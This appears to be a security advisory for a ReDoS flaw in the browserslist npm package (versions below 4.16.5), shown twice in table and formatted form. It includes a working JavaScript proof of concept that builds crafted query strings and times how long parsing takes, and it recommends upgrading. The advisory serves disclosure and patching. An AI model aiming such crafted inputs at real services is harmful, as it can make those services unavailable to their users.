Vulnerability	Vulnerable Version
M Regular Expression Denial of Service (ReDoS) browserslist is a Share target browsers between different front-end tools, like Autoprefixer, Stylelint and babel-env-preset Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries. PoC by Yeting Li var browserslist = require("browserslist") function build_attack(n) { var ret = "> " for (var i = 0; i < n; i++) { ret += "1" } return ret + "!"; } // browserslist('> 1%') //browserslist(build_attack(500000)) for(var i = 1; i <= 500000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) try{ browserslist(attack_str); var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms"); } catch(e){ var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms"); } } } How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `browserslist` to version 4.16.5 or higher.	<4.16.5

Regular Expression Denial of Service (ReDoS)

browserslist is a Share target browsers between different front-end tools, like Autoprefixer, Stylelint and babel-env-preset

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries.

PoC by Yeting Li

var browserslist = require("browserslist")
function build_attack(n) {
    var ret = "> "
    for (var i = 0; i < n; i++) {
        ret += "1"
    }
    return ret + "!";
}

// browserslist('> 1%')

//browserslist(build_attack(500000))
for(var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try{
            browserslist(attack_str);
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
            }
        catch(e){
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
        }
    }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade browserslist to version 4.16.5 or higher.

<4.16.5

Go back to all versions of this package